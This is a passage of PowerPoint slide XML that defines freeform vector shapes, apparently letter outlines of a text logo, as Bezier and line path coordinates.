                  <a:gd name="connsiteX5" fmla="*/ 61627 w 95250"/>
                  <a:gd name="connsiteY5" fmla="*/ 20288 h 123825"/>
                  <a:gd name="connsiteX6" fmla="*/ 61627 w 95250"/>
                  <a:gd name="connsiteY6" fmla="*/ 124778 h 123825"/>
                  <a:gd name="connsiteX7" fmla="*/ 39529 w 95250"/>
                  <a:gd name="connsiteY7" fmla="*/ 124778 h 123825"/>
                  <a:gd name="connsiteX8" fmla="*/ 39529 w 95250"/>
                  <a:gd name="connsiteY8" fmla="*/ 20384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5250" h="123825">
                    <a:moveTo>
                      <a:pt x="39624" y="20384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="20384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101251" y="20288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61627" y="20288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61627" y="124778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39529" y="124778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39529" y="20384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4" name="자유형: 도형 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A0F645-D3D3-CB42-8CCE-D2565BEF7EFF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2905133" y="3938008"/>
                <a:ext cx="104775" cy="123825"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 53054 w 104775"/>
                  <a:gd name="connsiteY0" fmla="*/ 126778 h 123825"/>
                  <a:gd name="connsiteX1" fmla="*/ 31147 w 104775"/>
                  <a:gd name="connsiteY1" fmla="*/ 123254 h 123825"/>
                  <a:gd name="connsiteX2" fmla="*/ 14383 w 104775"/>
                  <a:gd name="connsiteY2" fmla="*/ 112776 h 123825"/>
                  <a:gd name="connsiteX3" fmla="*/ 3715 w 104775"/>
                  <a:gd name="connsiteY3" fmla="*/ 95536 h 123825"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 104775"/>
                  <a:gd name="connsiteY4" fmla="*/ 71723 h 123825"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 104775"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX6" fmla="*/ 21717 w 104775"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX7" fmla="*/ 21717 w 104775"/>
                  <a:gd name="connsiteY7" fmla="*/ 70961 h 123825"/>
                  <a:gd name="connsiteX8" fmla="*/ 30099 w 104775"/>
                  <a:gd name="connsiteY8" fmla="*/ 97536 h 123825"/>
                  <a:gd name="connsiteX9" fmla="*/ 53435 w 104775"/>
                  <a:gd name="connsiteY9" fmla="*/ 106585 h 123825"/>
                  <a:gd name="connsiteX10" fmla="*/ 76581 w 104775"/>
                  <a:gd name="connsiteY10" fmla="*/ 97822 h 123825"/>
                  <a:gd name="connsiteX11" fmla="*/ 84963 w 104775"/>
                  <a:gd name="connsiteY11" fmla="*/ 71819 h 123825"/>
                  <a:gd name="connsiteX12" fmla="*/ 84963 w 104775"/>
                  <a:gd name="connsiteY12" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX13" fmla="*/ 106680 w 104775"/>
                  <a:gd name="connsiteY13" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX14" fmla="*/ 106680 w 104775"/>
                  <a:gd name="connsiteY14" fmla="*/ 70771 h 123825"/>
                  <a:gd name="connsiteX15" fmla="*/ 102870 w 104775"/>
                  <a:gd name="connsiteY15" fmla="*/ 95155 h 123825"/>
                  <a:gd name="connsiteX16" fmla="*/ 92107 w 104775"/>
                  <a:gd name="connsiteY16" fmla="*/ 112681 h 123825"/>
                  <a:gd name="connsiteX17" fmla="*/ 75248 w 104775"/>
                  <a:gd name="connsiteY17" fmla="*/ 123158 h 123825"/>
                  <a:gd name="connsiteX18" fmla="*/ 53054 w 104775"/>
                  <a:gd name="connsiteY18" fmla="*/ 126778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04775" h="123825">
                    <a:moveTo>
                      <a:pt x="53054" y="126778"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44958" y="126778"/>
                      <a:pt x="37624" y="125635"/>
                      <a:pt x="31147" y="123254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24574" y="120968"/>
                      <a:pt x="19050" y="117443"/>
                      <a:pt x="14383" y="112776"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9716" y="108109"/>
                      <a:pt x="6191" y="102394"/>
                      <a:pt x="3715" y="95536"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1238" y="88678"/>
                      <a:pt x="0" y="80772"/>
                      <a:pt x="0" y="71723"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21717" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21717" y="70961"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21717" y="82582"/>
                      <a:pt x="24479" y="91440"/>
                      <a:pt x="30099" y="97536"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35719" y="103632"/>
                      <a:pt x="43529" y="106585"/>
                      <a:pt x="53435" y="106585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63246" y="106585"/>
                      <a:pt x="70961" y="103632"/>
                      <a:pt x="76581" y="97822"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82201" y="92012"/>
                      <a:pt x="84963" y="83344"/>
                      <a:pt x="84963" y="71819"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="84963" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106680" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106680" y="70771"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="106680" y="80010"/>
                      <a:pt x="105442" y="88202"/>
                      <a:pt x="102870" y="95155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100298" y="102203"/>
                      <a:pt x="96679" y="108014"/>
                      <a:pt x="92107" y="112681"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87440" y="117348"/>
                      <a:pt x="81820" y="120872"/>
                      <a:pt x="75248" y="123158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68580" y="125635"/>
                      <a:pt x="61246" y="126778"/>
                      <a:pt x="53054" y="126778"/>
                    </a:cubicBez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5" name="자유형: 도형 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD85D84-20CA-284C-A95C-BC76B46D9931}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3035911" y="3997635"/>
                <a:ext cx="47625" cy="19050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 47625"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 19050"/>
                  <a:gd name="connsiteX1" fmla="*/ 52768 w 47625"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 19050"/>
                  <a:gd name="connsiteX2" fmla="*/ 52768 w 47625"/>
                  <a:gd name="connsiteY2" fmla="*/ 21241 h 19050"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 47625"/>
                  <a:gd name="connsiteY3" fmla="*/ 21241 h 19050"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 47625"/>
                  <a:gd name="connsiteY4" fmla="*/ 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19050">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52768" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52768" y="21241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="212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6" name="자유형: 도형 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77B4091-4B06-2840-AA02-0474AB4ED015}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3104014" y="3937151"/>
                <a:ext cx="123825" cy="123825"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 54959 w 123825"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX1" fmla="*/ 75248 w 123825"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX2" fmla="*/ 130207 w 123825"/>
                  <a:gd name="connsiteY2" fmla="*/ 125730 h 123825"/>
                  <a:gd name="connsiteX3" fmla="*/ 107061 w 123825"/>
                  <a:gd name="connsiteY3" fmla="*/ 125730 h 123825"/>
                  <a:gd name="connsiteX4" fmla="*/ 94393 w 123825"/>
                  <a:gd name="connsiteY4" fmla="*/ 95631 h 123825"/>
                  <a:gd name="connsiteX5" fmla="*/ 35338 w 123825"/>
                  <a:gd name="connsiteY5" fmla="*/ 95631 h 123825"/>
                  <a:gd name="connsiteX6" fmla="*/ 22479 w 123825"/>
                  <a:gd name="connsiteY6" fmla="*/ 125730 h 123825"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 123825"/>
                  <a:gd name="connsiteY7" fmla="*/ 125730 h 123825"/>
                  <a:gd name="connsiteX8" fmla="*/ 54959 w 123825"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX9" fmla="*/ 86297 w 123825"/>
                  <a:gd name="connsiteY9" fmla="*/ 76105 h 123825"/>
                  <a:gd name="connsiteX10" fmla="*/ 64675 w 123825"/>
                  <a:gd name="connsiteY10" fmla="*/ 26194 h 123825"/>
                  <a:gd name="connsiteX11" fmla="*/ 43244 w 123825"/>
                  <a:gd name="connsiteY11" fmla="*/ 76105 h 123825"/>
                  <a:gd name="connsiteX12" fmla="*/ 86297 w 123825"/>
                  <a:gd name="connsiteY12" fmla="*/ 76105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3825" h="123825">
                    <a:moveTo>
                      <a:pt x="54959" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="75248" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130207" y="125730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107061" y="125730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94393" y="95631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35338" y="95631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22479" y="125730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="125730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54959" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86297" y="76105"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64675" y="26194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43244" y="76105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86297" y="76105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7" name="자유형: 도형 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC59DC37-81F3-ED43-BAC8-C98665552FC3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3252033" y="3968679"/>
                <a:ext cx="76200" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 33433 w 76200"/>
                  <a:gd name="connsiteY0" fmla="*/ 96107 h 95250"/>
                  <a:gd name="connsiteX1" fmla="*/ 8668 w 76200"/>
                  <a:gd name="connsiteY1" fmla="*/ 86297 h 95250"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 76200"/>
                  <a:gd name="connsiteY2" fmla="*/ 59912 h 95250"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 76200"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX4" fmla="*/ 21717 w 76200"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX5" fmla="*/ 21717 w 76200"/>
                  <a:gd name="connsiteY5" fmla="*/ 53340 h 95250"/>
                  <a:gd name="connsiteX6" fmla="*/ 26956 w 76200"/>
                  <a:gd name="connsiteY6" fmla="*/ 70295 h 95250"/>
                  <a:gd name="connsiteX7" fmla="*/ 41720 w 76200"/>
                  <a:gd name="connsiteY7" fmla="*/ 76295 h 95250"/>
                  <a:gd name="connsiteX8" fmla="*/ 56960 w 76200"/>
                  <a:gd name="connsiteY8" fmla="*/ 70199 h 95250"/>
                  <a:gd name="connsiteX9" fmla="*/ 62770 w 76200"/>
                  <a:gd name="connsiteY9" fmla="*/ 53054 h 95250"/>
                  <a:gd name="connsiteX10" fmla="*/ 62770 w 76200"/>
                  <a:gd name="connsiteY10" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX11" fmla="*/ 84487 w 76200"/>
                  <a:gd name="connsiteY11" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX12" fmla="*/ 84487 w 76200"/>
                  <a:gd name="connsiteY12" fmla="*/ 94107 h 95250"/>
                  <a:gd name="connsiteX13" fmla="*/ 62770 w 76200"/>
                  <a:gd name="connsiteY13" fmla="*/ 94107 h 95250"/>
                  <a:gd name="connsiteX14" fmla="*/ 62770 w 76200"/>
                  <a:gd name="connsiteY14" fmla="*/ 79343 h 95250"/>
                  <a:gd name="connsiteX15" fmla="*/ 51245 w 76200"/>
                  <a:gd name="connsiteY15" fmla="*/ 91154 h 95250"/>
                  <a:gd name="connsiteX16" fmla="*/ 33433 w 76200"/>
                  <a:gd name="connsiteY16" fmla="*/ 96107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6200" h="95250">
                    <a:moveTo>
                      <a:pt x="33433" y="96107"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22765" y="96107"/>
                      <a:pt x="14478" y="92869"/>
                      <a:pt x="8668" y="86297"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2858" y="79820"/>
                      <a:pt x="0" y="70961"/>
                      <a:pt x="0" y="59912"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21717" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21717" y="53340"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21717" y="60674"/>
                      <a:pt x="23431" y="66389"/>
                      <a:pt x="26956" y="70295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30480" y="74295"/>
                      <a:pt x="35338" y="76295"/>
                      <a:pt x="41720" y="76295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48006" y="76295"/>
                      <a:pt x="53054" y="74295"/>
                      <a:pt x="56960" y="70199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60865" y="66103"/>
                      <a:pt x="62770" y="60388"/>
                      <a:pt x="62770" y="53054"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="62770" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84487" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84487" y="94107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62770" y="94107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62770" y="79343"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="59722" y="83915"/>
                      <a:pt x="55817" y="87821"/>
                      <a:pt x="51245" y="91154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46577" y="94488"/>
                      <a:pt x="40672" y="96107"/>
                      <a:pt x="33433" y="96107"/>
                    </a:cubicBez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8" name="자유형: 도형 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9411B671-830E-F64E-BDEB-F767DD23613F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3356141" y="3942866"/>
                <a:ext cx="57150" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 39243 w 57150"/>
                  <a:gd name="connsiteY0" fmla="*/ 121634 h 114300"/>
                  <a:gd name="connsiteX1" fmla="*/ 28289 w 57150"/>
                  <a:gd name="connsiteY1" fmla="*/ 120205 h 114300"/>
                  <a:gd name="connsiteX2" fmla="*/ 19526 w 57150"/>
                  <a:gd name="connsiteY2" fmla="*/ 115538 h 114300"/>
                  <a:gd name="connsiteX3" fmla="*/ 13906 w 57150"/>
                  <a:gd name="connsiteY3" fmla="*/ 107061 h 114300"/>
                  <a:gd name="connsiteX4" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY4" fmla="*/ 93917 h 114300"/>
                  <a:gd name="connsiteX5" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY5" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX6" fmla="*/ 0 w 57150"/>
                  <a:gd name="connsiteY6" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 57150"/>
                  <a:gd name="connsiteY7" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX8" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY8" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX9" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY9" fmla="*/ 0 h 114300"/>
                  <a:gd name="connsiteX10" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY10" fmla="*/ 0 h 114300"/>
                  <a:gd name="connsiteX11" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY11" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX12" fmla="*/ 58960 w 57150"/>
                  <a:gd name="connsiteY12" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX13" fmla="*/ 58960 w 57150"/>
                  <a:gd name="connsiteY13" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX14" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY14" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX15" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY15" fmla="*/ 90583 h 114300"/>
                  <a:gd name="connsiteX16" fmla="*/ 36671 w 57150"/>
                  <a:gd name="connsiteY16" fmla="*/ 99631 h 114300"/>
                  <a:gd name="connsiteX17" fmla="*/ 45244 w 57150"/>
                  <a:gd name="connsiteY17" fmla="*/ 102394 h 114300"/>
                  <a:gd name="connsiteX18" fmla="*/ 58579 w 57150"/>
                  <a:gd name="connsiteY18" fmla="*/ 99155 h 114300"/>
                  <a:gd name="connsiteX19" fmla="*/ 58579 w 57150"/>
                  <a:gd name="connsiteY19" fmla="*/ 116777 h 114300"/>
                  <a:gd name="connsiteX20" fmla="*/ 49816 w 57150"/>
                  <a:gd name="connsiteY20" fmla="*/ 120301 h 114300"/>
                  <a:gd name="connsiteX21" fmla="*/ 39243 w 57150"/>
                  <a:gd name="connsiteY21" fmla="*/ 1216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7150" h="114300">
                    <a:moveTo>
                      <a:pt x="39243" y="121634"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35338" y="121634"/>
                      <a:pt x="31718" y="121158"/>
                      <a:pt x="28289" y="120205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24956" y="119253"/>
                      <a:pt x="22003" y="117729"/>
                      <a:pt x="19526" y="115538"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17050" y="113443"/>
                      <a:pt x="15145" y="110585"/>
                      <a:pt x="13906" y="107061"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12573" y="103537"/>
                      <a:pt x="11906" y="99155"/>
                      <a:pt x="11906" y="93917"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="11906" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11906" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11906" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58960" y="25813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58960" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="44387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33623" y="90583"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="33623" y="94774"/>
                      <a:pt x="34671" y="97727"/>
                      <a:pt x="36671" y="99631"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38671" y="101441"/>
                      <a:pt x="41529" y="102394"/>
                      <a:pt x="45244" y="102394"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49911" y="102394"/>
                      <a:pt x="54388" y="101346"/>
                      <a:pt x="58579" y="99155"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58579" y="116777"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55817" y="118301"/>
                      <a:pt x="52959" y="119539"/>
                      <a:pt x="49816" y="120301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46863" y="121158"/>
                      <a:pt x="43244" y="121634"/>
                      <a:pt x="39243" y="121634"/>
                    </a:cubicBez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69" name="자유형: 도형 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDB9B59-DC7E-7C47-9337-30E0341EF6CC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3431484" y="3966774"/>
                <a:ext cx="95250" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 50006 w 95250"/>
                  <a:gd name="connsiteY0" fmla="*/ 98203 h 95250"/>
                  <a:gd name="connsiteX1" fmla="*/ 30099 w 95250"/>
                  <a:gd name="connsiteY1" fmla="*/ 94393 h 95250"/>
                  <a:gd name="connsiteX2" fmla="*/ 14192 w 95250"/>
                  <a:gd name="connsiteY2" fmla="*/ 83915 h 95250"/>
                  <a:gd name="connsiteX3" fmla="*/ 3715 w 95250"/>
                  <a:gd name="connsiteY3" fmla="*/ 68390 h 95250"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY4" fmla="*/ 49530 h 95250"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY5" fmla="*/ 49149 h 95250"/>
                  <a:gd name="connsiteX6" fmla="*/ 3810 w 95250"/>
                  <a:gd name="connsiteY6" fmla="*/ 30099 h 95250"/>
                  <a:gd name="connsiteX7" fmla="*/ 14288 w 95250"/>
                  <a:gd name="connsiteY7" fmla="*/ 14478 h 95250"/>
                  <a:gd name="connsiteX8" fmla="*/ 30194 w 95250"/>
                  <a:gd name="connsiteY8" fmla="*/ 3905 h 95250"/>
                  <a:gd name="connsiteX9" fmla="*/ 50292 w 95250"/>
                  <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX10" fmla="*/ 70390 w 95250"/>
                  <a:gd name="connsiteY10" fmla="*/ 3810 h 95250"/>
                  <a:gd name="connsiteX11" fmla="*/ 86296 w 95250"/>
                  <a:gd name="connsiteY11" fmla="*/ 14288 h 95250"/>
                  <a:gd name="connsiteX12" fmla="*/ 96774 w 95250"/>
                  <a:gd name="connsiteY12" fmla="*/ 29813 h 95250"/>
                  <a:gd name="connsiteX13" fmla="*/ 100489 w 95250"/>
                  <a:gd name="connsiteY13" fmla="*/ 48768 h 95250"/>
                  <a:gd name="connsiteX14" fmla="*/ 100489 w 95250"/>
                  <a:gd name="connsiteY14" fmla="*/ 49149 h 95250"/>
                  <a:gd name="connsiteX15" fmla="*/ 96679 w 95250"/>
                  <a:gd name="connsiteY15" fmla="*/ 68008 h 95250"/>
                  <a:gd name="connsiteX16" fmla="*/ 86201 w 95250"/>
                  <a:gd name="connsiteY16" fmla="*/ 83629 h 95250"/>
                  <a:gd name="connsiteX17" fmla="*/ 70199 w 95250"/>
                  <a:gd name="connsiteY17" fmla="*/ 94202 h 95250"/>
                  <a:gd name="connsiteX18" fmla="*/ 50006 w 95250"/>
                  <a:gd name="connsiteY18" fmla="*/ 98203 h 95250"/>
                  <a:gd name="connsiteX19" fmla="*/ 50387 w 95250"/>
                  <a:gd name="connsiteY19" fmla="*/ 79534 h 95250"/>
                  <a:gd name="connsiteX20" fmla="*/ 62198 w 95250"/>
                  <a:gd name="connsiteY20" fmla="*/ 77153 h 95250"/>
                  <a:gd name="connsiteX21" fmla="*/ 71152 w 95250"/>
                  <a:gd name="connsiteY21" fmla="*/ 70676 h 95250"/>
                  <a:gd name="connsiteX22" fmla="*/ 76867 w 95250"/>
                  <a:gd name="connsiteY22" fmla="*/ 61151 h 95250"/>
                  <a:gd name="connsiteX23" fmla="*/ 78867 w 95250"/>
                  <a:gd name="connsiteY23" fmla="*/ 49625 h 95250"/>
                  <a:gd name="connsiteX24" fmla="*/ 78867 w 95250"/>
                  <a:gd name="connsiteY24" fmla="*/ 49244 h 95250"/>
                  <a:gd name="connsiteX25" fmla="*/ 76771 w 95250"/>
                  <a:gd name="connsiteY25" fmla="*/ 37433 h 95250"/>
                  <a:gd name="connsiteX26" fmla="*/ 70866 w 95250"/>
                  <a:gd name="connsiteY26" fmla="*/ 27813 h 95250"/>
                  <a:gd name="connsiteX27" fmla="*/ 61817 w 95250"/>
                  <a:gd name="connsiteY27" fmla="*/ 21336 h 95250"/>
                  <a:gd name="connsiteX28" fmla="*/ 50197 w 95250"/>
                  <a:gd name="connsiteY28" fmla="*/ 18955 h 95250"/>
                  <a:gd name="connsiteX29" fmla="*/ 38576 w 95250"/>
                  <a:gd name="connsiteY29" fmla="*/ 21336 h 95250"/>
                  <a:gd name="connsiteX30" fmla="*/ 29623 w 95250"/>
                  <a:gd name="connsiteY30" fmla="*/ 27718 h 95250"/>
                  <a:gd name="connsiteX31" fmla="*/ 23908 w 95250"/>
                  <a:gd name="connsiteY31" fmla="*/ 37243 h 95250"/>
                  <a:gd name="connsiteX32" fmla="*/ 22003 w 95250"/>
                  <a:gd name="connsiteY32" fmla="*/ 48863 h 95250"/>
                  <a:gd name="connsiteX33" fmla="*/ 22003 w 95250"/>
                  <a:gd name="connsiteY33" fmla="*/ 49244 h 95250"/>
                  <a:gd name="connsiteX34" fmla="*/ 24098 w 95250"/>
                  <a:gd name="connsiteY34" fmla="*/ 60960 h 95250"/>
                  <a:gd name="connsiteX35" fmla="*/ 30004 w 95250"/>
                  <a:gd name="connsiteY35" fmla="*/ 70580 h 95250"/>
                  <a:gd name="connsiteX36" fmla="*/ 39052 w 95250"/>
                  <a:gd name="connsiteY36" fmla="*/ 77153 h 95250"/>
                  <a:gd name="connsiteX37" fmla="*/ 50387 w 95250"/>
                  <a:gd name="connsiteY37" fmla="*/ 7953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5250" h="95250">
                    <a:moveTo>
                      <a:pt x="50006" y="98203"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42863" y="98203"/>
                      <a:pt x="36290" y="96965"/>
                      <a:pt x="30099" y="94393"/>
